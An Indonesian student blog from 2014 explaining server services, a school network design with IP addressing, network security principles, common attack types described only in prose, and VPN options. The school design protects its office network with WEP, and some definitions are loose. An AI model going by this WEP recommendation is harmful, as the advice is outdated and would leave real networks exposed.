Rabu, 01 Oktober 2014

administrasi server pada jaringan komputer

  • AdministrasiServerJARKOM
    Administrasi Server Pada Jaringan Komputer adalah pengontrolan atau pengelolaan akses terhadap jaringan dan sumber daya yang terdapat di dalamnya. Administrasi itu sendiri merupakan suatu hal yang berhubungan dengan pengelolaan, pemberian jasa atau bantuan, dan pelayanan (Baca Artikel : Pengertian Definisi Administrasi) dan Server merupakan suatu bagian terpenting dari sebuah jaringan yang bertugas untuk menyediakan layanan yang dibutuhkan oleh client. Server juga didukung oleh processor dan RAM yang besar juga dilengkapi dengan sistem operasi khusus yang disebut sebagai sistem operasi jaringan.

    Dalam suatu administrasi server pada jaringan terdapat beberapa macam layanan atau service yang telah disediakan server menggunakan arsitektur client / server contohnya seperti berikut :

    1.DNS

    DNS (Domain Name System) adalah aplikasi pelayanan di internet untuk menerjemahkan nama – nama host (hostnames) menjadi alamat IP dan juga sebaliknya menerjemahkan alamat IP menjadi nama berbentuk teks yang berguna untuk memudahkan nama tersebut diingat oleh pengguna internet

    Struktur DNS
    Domain Name System merupakan hirarki pengelompokan domain berdasarkan nama, domain ditentukan berdasarkan kemampuan yang ada di struktur hirarki yang disebut level yang terdiri dari :

    1. Root-Level Domains 

    Merupakan level paling atas di hirarki yang di ekspresikan berdasarkan periode dan dilambangkan oleh .”.

    2. Top-Level Domains 

    Berisi second-level domains dan hosts yaitu :
  • com : organisasi komersial, seperti IBM (ibm.com).
  • edu  : institusi pendidikan, seperti U.C. Berkeley (berkeley.edu).
  • org  : organisasi non profit, Electronic Frontier Foundation (eff.org).
  • net  : organisasi networking, NSFNET (nsf.net).
  • gov : organisasi pemerintah non militer, NASA (nasa.gov).
  • mil  : organisasi pemerintah militer, ARMY (army.mil).
  • xx  : kode negara (id:Indonesia,au:Australia)

3. Second-Level Domains

Berisi domain lain yang disebut subdomain.
Contoh : unsri.ac.id
Second-Level Domains unsri.ac.id bisa mempunyai host www.unsri.ac.id

4. Third-Level Domains

Berisi domain lain yang merupakan subdomain dari second level domain diatasnya.
Contoh : ilkom.unsri.ac.id
Subdomain ilkom.unsri.ac.id juga mempunyai host www.ilkom.unsri.ac.id

5.Host Name

Domain name yang digunakan dengan host name akan menciptakan fully qualified domain name (FQDN) untuk setiap komputer. Contohnya, jika terdapat www.unsri.ac.id, www adalah hostname dan unsri.ac.id adalah domain name.

DNS Zone
Terdapat dua bentuk Pemetaan DNS Zone, yaitu:
  • Forward Lookup Zone  : Melakukan pemetaan dari nama menuju IP address
  • Reverse Lookup Zone  : Melakukan pemetaan dari IP address menuju nama

3. PROXY SERVER

Proxy Server adalah teknik standar utuk akses internet secara bersama-sama oleh beberapa komputer sekaligus dalam sebuah local area network (LAN) melalui sebuah modem atau sebuah salauran komunikasi. Secara sederhana, proxy adalah seseorang atau lembaga yang bertindak atas nama dari orang lain/lembaga/negara lain.

Proxy server bekerja dengan menjembatani komputer ke Internet. proxy server tersebutlah yang menghubungkan server ke server lain di internet.

4. DHCP

DHCP (Dynamic Host Configuration Protocol) adalah suatu layanan yang secara otomatis memberikan alamat IP kepada komputer yang meminta ke DHCP Server. atau Layanan yang memberikan IP secara otomatis ke semua client.

5. WEB SERVER

Web Server adalah sebuah perangkat lunak server yang berfungsi menerima permintaan HTTP atau HTTPS dari client yang dikenal dengan web browser dan mengirimkan kembali hasilnya dalam bentuk halaman-halaman web yang umumnya berbentuk dokumen HTML. Atau bisa diartikan Web Server adalah Sistem yang menberikan layanan web dan HTML sehingga client bisa mengakses halaman website.

6. FTP SERVER

FTP Server adalah suatu server yang menjalankan software yang memberikan layanan tukar menukar file dengan selalu siap memberikan layanan FTP apabila mendapat request dari FTP client.

7. MAIL SERVER

Mail server adalah Perangkat lunak program yang mendistribusikan file atau informasi sebagai respons atas permintaan yang dikirim via email, juga digunakan pada bitnet untuk menyediakan layanan serupa FTP.

8. NTP SERVER (Network Time Protocol)

NTP Server adalah Server yang sistem waktunya disindromkan (secara bersamaan) terhadap sumber waktu yang akurat dan mentransmisikan paket informasi waktu kepada komputer lain.

9. Game server

Game server adalah tempat dimana kita bermain game secara online. Game server adalah suatu wadah bagi permainan online untuk menitipkan data permainan di suatu tempat yang besar. Kita harus memaintance game server setiap 1 minggu sekali. Hal ini berguna untuk progam yang di dalamnya bejalan dengan lancar.

10. DATABASE SERVER

Database Server adalah layanan penyimpanan database. Dalam server database tersebut, bisa berisi ratusan ataupun ribuan database dari banyak user. Biasanya database tersebut dikelompokkan atau disimpan per user yang memakai layanan database tersebut. Agar tidak terjadinya pencurian data.

Nah cukup sekian artikel tentang Administrasi Server Pada Jaringan Komputer yang dapat saya share di blog ini semoga dengan adanya artikel ini dapat membantu sobat dalam mencari tugas sekolah / kuliah yang berhubungan dengan Jaringan Komputer. sampai bertemu kembali semoga bermanfaat. Jangan lupa Komentarnya gan :)

rancangan sistem jaringan komputer

RANCANGAN SISTEM JARINGAN KOMPUTER
STUDI KASUS
Karena saya bersekilah di SMA NEGERI 1 NEGARA JEMBRANA BALI INDONESIA
SMA NEGERI 1 NEGARA
LATAR BELAKANG
Salah satu sekolah menengah kejuruan di kota Negare, yaitu SMA Negeri 1 Negare. SMA Negeri 1 Negare merupakan Sekolah Menengah Atas yang ada di kabupaten Jembrana Kecamatan Negare. SMA Negeri 1 Negara akan melakukan pemasangan sistem jaringan yang meliputi jaringan kantor dan jaringan hotspot. Jaringan kantor yang dimaksud adalah jaringan yang menghubungkan antara kantor-kantor yang terdapat pada SMA Negeri 1 Negara misalnya seperti Ruang Guru, Ruang Tata Usaha, Ruang Kepala Sekolah, Ruang Wakil Kepala Sekolah, Kurang Lab, yaitu Lab Komputer I dan Lab Komputer II. Jaringan hotspot yang akan dibangun diharapkan mampu mencapup seluruh lingkungan sekolah, baik di ruangan kelas, lapangan olah raga, tempat parkir, perpustakaan dan kantin. Pemasangan rancangan ini bertujuan untuk mempermudah penghuni sekolah untuk mengakses data dari 1 komputer ke komputer lain, selain itu juga dapat terhubung ke internet sesuai dengan komputer yang terdapat pada kantor – kantor, lab dan ruang kelas.
ini merupakan denah SMA NEGERI 1 NEGARA maap gambarnya masih agak new bie
Untitled
GAMBAR RANCANGAN JARINGAN
rancangan jaringan
DAFTAR HARDWARE YANG DIPERLUKAN
Adapun Hardware yang diperlukan untuk membangun jaringan lokal di SMA Negeri 1 Negara adalah sebagai berikut :
PC Server:
Spesifikasi :
a. Processor
b. Motherboard
c. Harddisk SATA
d. RAM
e. DVD R/RW
f. LCD Monitor 15 inchi
g. Mouse USB Optical
h. Keyboard USB
i. Casing 1 Unit
PC Client:
Spesifikasi :
a. Processor
b. Motherboard
c. Harddisk SATA
d. RAM
e. DVD R/RW
f. LCD Monitor 15 inchi
g. Mouse USB Optical
h. Keyboard USB
i. Casing 55 Unit
PC Router
Spesifikasi :
a. Processor
b. Motherboard
c. Harddisk SATA
d. RAM
e. DVD R/RW
f. LCD Monitor 15 inchi
g. Mouse USB Optical
h. Keyboard USB
i. Casing
Alat – Alat Jaringan;
1 Unit Modem ADSL
2 Kabel UTP
3 1 Roll (500 Meter)
5 Kabel Tester 1 Buah
6 Tang Krimping 1 Buah
7 Konektor RJ-45 1 Box
8 Stabilizer 2 Buah
9 Stavolt 7500 N 5 Buah
10 Switch 24 Port 3 Buah
11 UPS 1 Buah
12 Wireless Access Point 1 Buah
13 Wireless Card 2Buah
SOFTWARE YANG DIGUNAKAN
Perangkat lunak yang digunakan pada sistem jaringan ini adalah sebagai berikut.
1. Cisco Packet Tracer
Digunakan untuk simulasi rancangan jaringan. Sebelum membuat jaringan yang sesungguhnya, sebaiknya melakukan simulasi terlebih dahulu agar dapat mengurangi kesalahan yang dapat menyebabkan kerugian baik dari pihak perancang ataupun pihak sekolah yang akan dipasangkan jaringan.
2. Sistem Operasi Linux Ubuntu Server
Menggunakan Sistem Operasi Linux Ubuntu Server Karena Selain Keamanan yang lebih baik linux ubuntu server juga di gunakan di perusahaan – perusahaan.
RANCANGAN JARINGAN
GAMBARAN RANCANGAN JARINGAN DAN PENJELASANNYA SECARA DETAIL
pcre
CISCO PACKET TRACER SETTING IP DAN TEST KONEKSI DALAM RANCANGAN JARINGAN SMA N 1 NEGARA
1. FastEthernet0/0 Router
Menggunakan kelas IP 192.168.10.1 dengan Subnest Mask 255.255.255.0. Disini menggunakan 2 kelas untuk mengantisifasi jika terdapat banyak komputer yang terkoneksi dengan internet.
2. FastEthernet0/1 Router
Menggunakan Kelas IP 192.168.1.1 dengan Subnet Mask 255.255.255.0
3. Gambar Konfigurasi IP Server
Seperti yang terlihat pada gambar di bawah, disini di inputkan IP Adress 192.168.1.2 dengan Sunet Mask 255.255.255.0 dan Default Gateway 192.168.1.1 dimana pada default gateway disini menginputkan IP router agar jaringan dapat terhubung. Dan pada server juga mengaktifkan DHCP, agar komputer yang belum terdapat IP secara Otomatis akan di berikan IP oleh Server.
4. Gambar Konfigurasi IP PC
Pada PC disini menggunakan IP 192.168.1.3 sampai 192.168.1.22 sesuai dengan banyaknya PC yang terdapat pada Lab Komputer I
5. Gambar Konfigurasi IP Tablet PC
Pada Tablet PC disini menggunakan DHCP, dimana IP pada tablet PC disini di berikan oleh server secara otomatis
6. IP Wirelles PC
Pada Wirelles PC disini hampir sama dengan tablet PC dimana IP address yang ada terdapat disini langsung diberikan oleh server
7. Gambar Konfigurasi IP PC
Pada Gambar di bawah ini menggunakan kelas IP 192.168.10.3 dengan Subnet Mask 255.255.255.0 dan Gateway 192.168.10.1. Pada IP gateway disini merupakan ip router. Dengan mengisi ip gateway disini bertujuan agar dapat terhubung atau terkoneksi dengan server.
8. Gambar Konfigurasi IP Printer
Pada IP printer disini menggunakan DHCP. Langsung diberikan IP oleh server
ARSITEKTUR JARINGAN
Adapun arsitektur yang digunakan dalam jaringan LAN ini adalah arsitektur jaringan server-client yang terdapat satu komputer server dan satu atau lebih komputer client dalam jaringan komputer tersebut. Arsitektur Jaringan terdiri dari pengkabelan topologi , metoda akses dan format paket. Arsitektur yang umum digunakan dalam jaringan LAN adalah berbasis kabel elektrik, melalui perkembangan teknologi optik kini banyak digunakan juga serat kabel optik sebagai media alternatif beserta kelebihan dan kekurangannya. Arsitektur jaringan lahir pada masa kondisi transisi. ARCnet, Ethernet dan Token -Ring merupakan salah satu contoh arsitektur lama yang akan segera digantikan dengan arsitektur lain dengan kecepatan yang lebih tin ggi. Arsitektur jaringan yang sekarang banyak dipakai, meskipun dianggap obsolute, mendukung transmisi mulai dari 2,5 Mbps untuk jaringan ARCnet, 10 Mbps Ethernet dan 16 Mbps untuk jaringan Token-Ring. Arsitektur Jaringan ini telah dikembangkan untuk kinerja yang lebih tinggi, pada jaringan ARCnet ditingkatkan menjadi ARCnet Plus 20Mbps dan Ethernet ditingkatkan menjadi 100 Mbps Fast Ethernet dan 1000 Mbps (1 Gbps) dengan nama Gigabit Ethernet.
TOPOLOGI YANG DIGUNAKAN
Pada topologi star, masing-masing workstation dihubungkan secara langsung ke server atau HUB. Keunggulan dari topologi tipe Star ini adalah bahwa dengan adanya kabel tersendiri untuk setiap workstation ke server, maka bandwidth atau lebar jalur komunikasi dalam kabel akan semakin lebar sehingga akan meningkatkan unjuk kerja jaringan secara keseluruhan. Dan juga bila terdapat gangguan di suatu jalur kabel maka gangguan hanya akan terjadi dalam komunikasi antara workstation yang bersangkutan dengan server, jaringan secara keseluruhan tidak mengalami gangguan. Kelemahan dari topologi Star adalah kebutuhan kabel yang lebih besar dibandingkan dengan topologi lainnya.
Topologi jaringan ini banyak digunakan diberbagai tempat, karena kemudahan untuk menambah, mengurangi atau mendeteksi kerusakan dalam jaringan. Panjang kabel yang digunakan bukan masalah lagi pada jaringan ini, karena selain bisa digunakan penguat sinyal bisa juga dengan menggunakan hub (switch) sebagai terminalnya.
Bentuk seperti bintang karena dalam rancangannya memiliki node (titik) terpusat, yang kemudian dihubungkan dengan node-node atau wordstation yang lainnya. Media untuk transmisi datanya biasa dengan menggunakan kabel UTP (Unshielded Twisted Pair).
 Keuntungan
1. Paling fleksibel
2. Pemasangan/perubahan stasiun sangat mudah dan tidak mengganggu
3. bagian jaringan lain
4. Kontrol terpusat
5. Kemudahan deteksi dan isolasi kesalahan/kerusakan pengelolaan
6. jaringan
 Kerugian
1. Boros kabel
2. Perlu penanganan khusus
3. Kontrol terpusat (HUB) jadi elemen kritis
IP yang akan digunakan adalah IP kelas C
IP Address adalah pengalamatan jaringan computer yang terdiri dari 32 bit biner. Untuk membuat jaringan LAN disini dapat menggunakan IP Address salah satu kelas dibawah ini :
Kelas A : 10.x.x.x dengan subnet mask 255.0.0.0
Kelas B : 172.16.x.x – 172.31.x.x dengan subnet mask 255.255.0.0
Kelas C : 192.168.x.x dengan subnet mask 255.255.255.0
Dalam satu jaringan LAN, semua komputer harus menggunakan kelas yang sama. Disini menggunakan IP Kelas C. Karena jumlah computer yang terkoneksi sedikit, dimana kelas C ini mampu mengkoneksikan maksimal 254 komputer. Jadi kita menggunakan IP : 192.168.x.x dengan Subnet 255.255.255.0 .
255.255.255. 0 maksudnya 24 bit pada IP Address merupakan network address sedangkan 8 bit berikutnya adalah host ID. Nilai x di atas dapat di isi terserah dengan range 1 – 254. Jadi :
192.168.x Adalah Network address sedangkan x Host ID
Jadi Range alamat IP Address LAN kita nantinya = 192.168.1.1 – 192.168.1.254 Subnetmask 255.255.255.0
KEAMANAN SISTEM
Sistem keamanan jaringan yang dirancang menggunakan RADIUS sistem untuk jaringan hotspot siswa dan menggunakan WEP sistem untuk jaringan kantor. Siswa yang hendak mengakses internet harus memiliki user account terlebih dahulu. Sehingga penggunaan internet untuk siswa dapat dipantau. Selain itu untuk menjauhkan server dari data yang berbahaya dari internet disini menggunakan firewall agar data yang terdapat pada server tetap aman. Berikut adalah contoh gambaran server yang dilindungi oleh firewall dari data yang berbahaya.
pwersuplay

TUGAS DKK


Pengertian Keamanan Komputer dan Konsep Keamanan Jaringan



Keamanan jaringan komputer sebagai bagian dari sebuah sistem informasi adalah sangat penting untuk menjaga validitas dan integritas data serta menjamin keterrsediaan layanan begi penggunanya. Sistem harus dilindungi dari segala macam serangan dan usaha-usaha penyusupan atau pemindaian oleh pihak yang tidak berhak.
Komputer yang terhubung ke jaringan mengalami ancaman keamanan yang lebih besar daripada host yang tidak terhubung kemana-mana. Dengan mengendalikan network security, resiko tersebut dapat dikurangi. Namun network security biasanya bertentangan dengan network acces, karena bila network acces semakin mudah, network security makin rawan. Bila network security makin baik, network acces semakin tidak nyaman. Suatu jaringan didesain sebagai komunikasi data highway dengan tujuan meningkatkan akses ke sistem komputer, sementara keamanan didesain untuk mengontrol akses. Penyediaan network security adalah sebagai aksi penyeimbang antara open acces dengan security.
Prinsip Keamanan Jaringan
Prinsip keamanan jaringan dapat dibedakan menjadi tiga, yaitu :
a. Kerahasiaan
Kerahasiaan berhubungan dengan hak akses untuk membaca data atau informasi dan suatu sistem computer. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi hanya dapat dibaca oleh pihak yang telah diberi hak atau wewenang secara legal.
b. Integritas (integrity)
Integrity berhubungan dengan hak akses untuk mengubah data atau informasi dari suatu sistem computer. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi hanya dapat diubah oleh pihak yang telah diberi hak.
c. Ketersediaan (availability)
Availability berhubungan dengan ketersediaan data atau informasi pada saat yang dibutuhkan. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi yang terdapat pada sistem komputer dapat diakses dan dimanfaatkan oleh pihak yang berhak.
d. Authentication
Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul-betul asli, orang yang mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud, atau server yang kita hubungi adalah betul-betul server yang asli.
Untuk membuktikan keaslian dokumen dapat dilakukan dengan teknologi watermarking dan digital signature. Sedangkan untuk menguji keaslian orang atau server yang dimaksud bisa dilakukan dengan menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya.
e. Akses Kontrol
Aspek kontrol merupakan fitur-fitur keamanan yang mengontrol bagaimana user dan sistem berkomunikasi dan berinteraksi dengan system dan sumberdaya yang lainnya. Akses kontrol melindungi sistem dan sumberdaya dari akses yang tidak berhak dan umumnya menentukan tingkat otorisasi setelah prosedur otentikasi berhasil dilengkapi.
Kontrol akses adalah sebuah term luas yang mencakup beberapa tipe mekanisme berbeda yang menjalankan fitur kontrol akses pada sistem komputer, jaringan, dan informasi. Kontrol akses sangatlah penting karena menjadi satu dari garis pertahanan pertama yang digunakan untuk menghadang akses yang tidak berhak ke dalam sistem dan sumberdaya jaringan.
f. Non-Repudiation
Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Penggunaan digital signature, certificates, dan teknologi kriptografi secara umum dapat menjaga aspek ini. Akan tetapi hal ini masih harus didukung oleh hukum sehingga status dari digital signature itu jelas legal.
Jenis Serangan Terhadap Keamanan Jaringan
Pada dasarnya, menurut jenisnya, serangan terhadap suatu data dalam suatu jaringan dapat dikategorikan menjadi 2, yaitu:
1. Serangan Pasif
Merupakan serangan pada sistem autentikasi yang tidak menyisipkan data pada aliran data, tetapi hanya mengamati atau memonitor pengiriman informasi ke tujuan. Informasi ini dapat digunakan di lain waktu oleh pihak yang tidak bertanggung jawab. Serangan pasif yang mengambil suatu unit data kemudian menggunakannya untuk memasuki sesi autentikassi dengan berpura-pura menjadi user yangg autentik / asli disebut dengan replay attack. Beberapa informasi autentikasi seperti password atau data biometric yang dikirim melalui transmisi elektronik dapat direkam dan kemudian digunakan untuk memalsukann data yang sebenarnya. Serangan pasif inni sulit dideteksi kareena penyerang tidak melakukan perubahan data. Oleh sebab itu untuk mengatasi serangan pasif ini lebih ditekankan pada pencegahan daripada pendeteksiannya.
2. Serangan Aktif
Merupakan serangan yang mencoba memodifikasi data, mencoba mendapatkan autentikasi, atau mendapatkan autentikasi dengan mengirimkan paket-paket data yang salah ke dalam data stream atau dengan memodifikassi paket-paket yang melewati data stream. Kebalikan dari serangan pasif, serangan aktif sulit untuk dicegah karena untuk melakukannya dibutuhkan perlindungan fisik untuk semua fasilitass komunikassi dan jalur-jalurnya setiap saat. Yang dapat dilakukan adalah mendeteksi dan memulihkan keadaan yang disebabkan oleh serangan ini.
Bentuk-bentuk Ancaman
1. Memaksa masuk dan kamus password
Jenis ancaman keamanan jaringan ini lebih umum disebut sebagai Brute Force and Dictionary, serangan ini adalah upaya masuk ke dalam jaringan dengan menyerang database password atau menyerang login prompt yang sedang active. Serangan masuk paksa ini adalah suatu upaya untuk menemukan password dari account user dengan cara yang sistematis mencoba berbagai kombinasi angka, huruf, atau symbol. Sementara serangan dengan menggunakan metoda kamus password adalah upaya menemukan password dengan mencoba berbagai kemungkinan password yang biasa dipakai user secara umum dengan menggunakan daftar atau kamus password yang sudah di-definisikan sebelumnya.
Untuk mengatasi serangan keamanan jaringan dari jenis ini anda seharusnya mempunyai suatu policy tentang pemakaian password yang kuat diantaranya untuk tidak memakai password yang dekat dengan kita missal nama, nama anak, tanggal lahir dan sebagainya. Semakin panjang suatu password dan kombinasinya semakin sulit untuk diketemukan. Akan tetapi dengan waktu yang cukup, semua password dapat diketemukan dengan metoda brute force ini.
2. Denial of Services (DoS)
Deniel of Services (DoS) ini adalah salah satu ancaman keamanan jaringan yang membuat suatu layanan jaringan jadi mampet, serangan yang membuat jaringan anda tidak bisa diakses atau serangan yang membuat system anda tidak bisa memproses atau merespon terhadap traffic yang legitimasi atau permintaan layanan terhadap object dan resource jaringan. Bentuk umum dari serangan Denial of Services ini adalah dengan cara mengirim paket data dalam jumlah yang sangat bersar terhadap suatu server dimana server tersebut tidak bisa memproses semuanya. Bentuk lain dari serangan keamanan jaringan Denial of Services ini adalah memanfaatkan telah diketahuinya celah yang rentan dari suatu operating system, layanan-2, atau applikasi-2. Exploitasi terhadap celah atau titik lemah system ini bisa sering menyebabkan system crash atau pemakaian 100% CPU.
Tidak semua Denial of Services ini adalah merupakan akibat dari serangan keamanan jaringan. Error dalam coding suatu program bisa saja mengakibatkan kondisi yang disebut DoS ini. Disamping itu ada beberapa jenis DoS seperti:
Distributed Denial of Services (DDoS), terjadi saat penyerang berhasil meng-kompromi beberapa layanan system dan menggunakannya atau memanfaatkannya sebagai pusat untuk menyebarkan serangan terhadap korban lain.
Ancaman keamanan jaringan Distributed refelective deniel of service (DRDoS) memanfaatkan operasi normal dari layanan Internet, seperti protocol-2 update DNS dan router. DRDoS ini menyerang fungsi dengan mengirim update, sesi, dalam jumlah yang sangat besar kepada berbagai macam layanan server atau router dengan menggunakan address spoofing kepada target korban.
Serangan keamanan jaringan dengan membanjiri sinyal SYN kepada system yang menggunakan protocol TCP/IP dengan melakukan inisiasi sesi komunikasi. Seperti kita ketahui, sebuah client mengirim paket SYN kepada server, server akan merespon dengan paket SYN/ACK kepada client tadi, kemudian client tadi merespon balik juga dengan paket ACK kepada server. Ini proses terbentuknya sesi komunikasi yang disebut Three-Way handshake yang dipakai untuk transfer data sampai sesi tersebut berakhir. Kebanjiran SYN terjadi ketika melimpahnya paket SYN dikirim ke server, tetapi si pengirim tidak pernah membalas dengan paket akhir ACK.
Serangan keamanan jaringan dalam bentuk Smurf Attack terjadi ketika sebuah server digunakan untuk membanjiri korban dengan data sampah yang tidak berguna. Server atau jaringan yang dipakai menghasilkan response paket yang banyak seperti ICMP ECHO paket atau UDP paket dari satu paket yang dikirim. Serangan yang umum adalah dengan jalan mengirimkan broadcast kepada segmen jaringan sehingga semua node dalam jaringan akan menerima paket broadcast ini, sehingga setiap node akan merespon balik dengan satu atau lebih paket respon.
Serangan keamanan jaringan Ping of Death, adalah serangan ping yang oversize. Dengan menggunakan tool khusus, si penyerang dapat mengirimkan paket ping oversized yang banyak sekali kepada korbannya. Dalam banyak kasus system yang diserang mencoba memproses data tersebut, error terjadi yang menyebabkan system crash, freeze atau reboot. Ping of Death ini tak lebih dari semacam serangan Buffer overflow akan tetapi karena system yang diserang sering jadi down, maka disebut DoS attack.
Stream Attack terjadi saat banyak jumlah paket yang besar dikirim menuju ke port pada system korban menggunakan sumber nomor yang random.
3. Spoofing
Spoofing adalah seni untuk menjelma menjadi sesuatu yang lain. Spoofing attack terdiri dari IP address dan node source atau tujuan yang asli atau yang valid diganti dengan IP address atau node source atau tujuan yang lain.
4. Serangan Man-in-the-middle
Serangan keamanan jaringan Man-in-the-middle (serangan pembajakan) terjadi saat user perusak dapat memposisikan diantara dua titik link komunikasi.
* Dengan jalan mengkopy atau menyusup traffic antara dua party, hal ini pada dasarnya merupakan serangan penyusup.
* Para penyerang memposisikan dirinya dalam garis komunikasi dimana dia bertindak sebagai proxy atau mekanisme store-and-forwad (simpan dan lepaskan).
Para penyerang ini tidak tampak pada kedua sisi link komunikasi ini dan bisa mengubah isi dan arah traffic. Dengan cara ini para penyerang bisa menangkap logon credensial atau data sensitive ataupun mampu mengubah isi pesan dari kedua titik komunikasi ini.
5. Spamming
Spam yang umum dijabarkan sebagai email yang tak diundang ini, newsgroup, atau pesan diskusi forum. Spam bisa merupakan iklan dari vendor atau bisa berisi kuda Trojan. Spam pada umumnya bukan merupakan serangan keamanan jaringan akan tetapi hampir mirip DoS.
6. Sniffer
Suatu serangan keamanan jaringan dalam bentuk Sniffer (atau dikenal sebagai snooping attack) merupakan kegiatan user perusak yang ingin mendapatkan informasi tentang jaringan atau traffic lewat jaringan tersebut. suatu Sniffer sering merupakan program penangkap paket yang bisa menduplikasikan isi paket yang lewat media jaringan kedalam file. Serangan Sniffer sering difokuskan pada koneksi awal antara client dan server untuk mendapatkan logon credensial, kunci rahasia, password dan lainnya.
7. Crackers
Ancaman keamanan jaringan Crackers adalah user perusak yang bermaksud menyerang suatu system atau seseorang. Cracker bisasanya termotivasi oleh ego, power, atau ingin mendapatkan pengakuan. Akibat dari kegiatan hacker bisa berupa pencurian (data, ide, dll), disable system, kompromi keamanan, opini negative public, kehilangan pasar saham, mengurangi keuntungan, dan kehilangan produktifitas.
VPN

Virtual Private Network(VPN) adalah solusi koneksi private melalui jaringan publik. Dengan VPN maka kita dapat membuat jaringan di dalam jaringan atau biasa disebut tunnel.

Solusi VPN :
IPSEC, solusi VPN via IP Secure Protocol. Solusi yang sudah distandarisasi tapi paling susah dikonfigurasi. Tingkat keamanan yang cukup baik namun dalam implementasinya cukup rumit. Aplikasi yang digunakan yang berbasis open source yaitu Open/Free Swan.
PPPT, solusi VPN versi awal. Merupakan solusi VPN dengan feature standar dimana jaringan dibangun dengan point to point seperti halnya anda melakukan dial up pada internet dirumah. Pada saat dial up ke provider internet ada maka akan dibangun point to point tunnel melalui jaringan telepon. Aplikasi OpenSource yang menggunakan PPPT adalah PopTop.
VPN with SSL, merupakan solusi VPN dengan menerapkan protocol Secure Socket Layer(SSL) pada enkripsi jaringan tunnel yang dibuat. Solusi ini diawali dengan aplikasi OpenVPN.
Fungsi VPN :
Menghubungkan kantor-kantor cabang melalui jaringan public. Dengan VPN maka perusahaan tidak perlu membangun jaringan sendiri. Cukup terhubung dengan jaringan public contohnya internet. Saat ini hampir semua kantor perusahaan pasti memiliki akses internet. Dengan demikin bisa dihemat anggaran koneksi untuk ke cabang-cabang.
Mobile working, dengan VPN maka karyawan dapat terhubung langsung dengan jaringan kantor secara private. Maka karyawan dapat melakukan pekerjaan yang bisa dilakukan dari depan komputer tanpa harus berada di kantor. Hal ini menjadi solusi virtual office di jaman mobilitas tinggi seperti sekarang ini.
Securing your network. Saat ini beberapa vendor seperti telkom memberikan solusi VPN juga untuk perusahaan-perusahaan. Namun solusi ini masih kurang aman. Karena untuk terhubung tidak memerlukan authentikasi. Sehingga bila ada pengguna mengetahui settingan VPN perusahaan tersebut maka dia dapat terhubung ke jaringan perusahaan tapi harus login. Contohnya pada telkomsel VPN hanya dengan mengganti nama APN pada settingan network maka dia dapat langsung terhubung dengan jaringan dengan nama APN tersebut. Dengan memasang VPN lagi di jaringan VPN semi publik tersebut maka jaringan akan lebih aman karena sebelum masuk ke jaringan kantor maka user harus membuat tunnel dulu dan login ke VPN server baru bisa terhubung dengan jaringan kantor.
Mengamankan jaringan wireless. Jaringan wireless merupakan jaringan publik yang bisa diakses oleh siapa saja yang berada dijangkauan wireless tersebut. Walaupun wireless juga memiliki pengaman seperti WEP, WPA, WPA2 namun jaringan wireless masih saja bisa ditembus. Dengan menggunakan VPN maka user yang terhubung ke wireless harus membuat tunnel dulu dengan login ke VPN server baru bisa menggunakan resource jaringan seperti akses internet dan sebagainya.
Dari beberapa solusi yang ada saat ini yang paling banyak digunakan adalah solusi VPN dengan SSL yaitu dengan OpenVPN sebagai aplikasinya. Selain gratis karena open source juga memiliki kemudahan implementasi. Saya lebih memilih menggunakan OpenVPN karena kemudahan implementasinya serta bersifat multiplatform dapat dijalankan pada Linux ataupun Windows.
Manfaat VPN :
  • Biaya lebih murah
Pembangunan jaringan leased line khusus atau pribadi memerlukan biaya yang sangat mahal. VPN dapat menjadi alternatif yang dapat digunakan untuk dapat mengatasi permasalahan diatas. VPN dibangun dengan menggunakan jaringan internet milik publik tanpa perlu membangun jaringan pribadi. Dengan demikian bila ingin menggunakan VPN hanya diperlukan koneksi internet.
  • Fleksibilitas
Semakin berkembangnya internet, dan makin banyaknya user yang menggunakannya membuat VPN juga ikut berkembang. Setiap user dapat tergabung dalam VPN yang telah dibangun tanpa terbatas jarak dan waktu. Fleksibilitas dapat dicapai apabila user tersebut terkoneksi dengan internet dan mendapat ijin menggunakan VPN.
  • Kemudahan pengaturan dan administrasi
Keseluruhan VPN dapat diatur dalam server VPN sendiri, dan untuk dapat digunakan oleh klien, maka perlu diinstal aplikasi VPN pada klien. Hal ini tentu lebih mudah apabila dibandingkan dengan menggunakan leased line yang masih perlu memonitor modem.
  • Mengurangi kerumitan pengaturan dengan teknologi tunneling
Tunneling atau terowongan merupakan kunci utama pada VPN. Koneksi pribadi dalam VPN dapat terjadi dimana saja selama terdapat tunnel yang menghubungkan pengirim dan penerima data. Dengan adanya tunnel ini, maka tidak diperlukan pengaturan-pengaturan lain yang ada di luar tunnel tersebut, asalkan sumber dari tunnel tersebut dapat menjangkau tujuannya.

Implementasi VPN :

1. Intranet VPN

Intranet merupakan koneksi VPN yang membuka jalur komunikasi pribadi menuju ke jarinan lokal yang bersifat pribadi melalui jaringan publik seperti internet. Dengan melalui VPN jenis ini, user dapat langsung mengakses file-file kerja dengan leluasa tanpa terikat tempat dan waktu. Apabila dianalogikan pada sebuah perusahaan, koneksi ke kantor pusat dapat dilakukan dari mana saja, dari kantor pusat menuju ke kantor cabang dapat pula dibuat koneksi pribadi, dan juga dari kantor juga memungkinkan untuk dibuat jalur komunikasi pribadi yang ekonomis.
2. Ekstranet VPN

Ekstranet VPN merupakan fasilitas VPN yang diperuntukkan bagi pihak-pihak dari luar anggota organisasi atau perusahaan, tetapi masih memiliki hak dan kepentingan untuk dapat mengakses data dalam kantor. Pada umumnya user dari VPN dari jenis ini merupakan customer, vendor, partnet dan supplier dari suatu perusahaan.

3. Model Remote Access VPN

VPN merupakan sebuah proses remote access yang bertujuan mendapatkan koneksi ke jaringan private tujuannya. Proses remote accsess VPN tersebut dibedakan menjadi dua jenis berdasarkan oleh siapa proses remote access VPN tersebut dilakukan. Kedua jenis tersebut antara lain sebagai berikut.

4. Client-initiated

